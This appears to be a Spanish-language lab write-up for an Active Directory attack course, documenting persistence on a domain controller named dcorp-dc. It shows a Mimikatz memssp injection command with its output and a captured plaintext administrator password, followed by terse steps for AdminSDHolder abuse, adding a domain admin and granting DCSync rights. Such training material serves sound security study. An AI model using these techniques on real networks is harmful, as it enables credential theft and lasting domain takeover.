Learning Objective - 12

Custom SSP

PS C:\AD\Tools> Invoke-Mimikatz -Command '"misc::memssp"' -ComputerName dcorp-dc

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # misc::memssp
Injected =)

PS C:\AD\Tools> cat \\dcorp-dc\c$\windows\system32\mimilsa.log
[00000000:006d432e] dcorp\Administrator *DollarMakesEveryoneHappy

PS C:\AD\Tools> cat \\dcorp-dc\c$\windows\system32\mimilsa.log
[00000000:006d432e] dcorp\Administrator *DollarMakesEveryoneHappy
[00000000:006d82d7] dcorp\Administrator *DollarMakesEveryoneHappy
[00000000:006db07e] dcorp\Administrator *DollarMakesEveryoneHappy

AdminSDHolder

Se evidencia en el BloodHound

Agregando a un usuario como domain admin

validamos nuestros permisos

Validamos que el usuario testad no es domain admin.

Ahora lo agregamos.

Volvemos a verificar.

Tambien podemos remover usuarios.

Forzando el cambio de clave

Agregamos los permisos para reinicio de clave.

Ejecutamos el Invoke-SDPropagator para aplicar los cambios ahora mismo.

Verificamos los permisos:

intentando reiniciar la clave.

Se recomiendo segun lo analizado en las pruebas, que nose maneje mas de 1 permisos por acl en el AdminSDHolder.

Rights Abuse

Validamos si puede realizar DcSync.

Luego le asignamos los permisos:

Se puede validar el permiso asignado en el bloodhound.

Probamos de nuevo el dcsync.

Asi como se dio todos los permisos hacia el dc, tambien se puede dar permisos específicamente para DCSync.

Last updated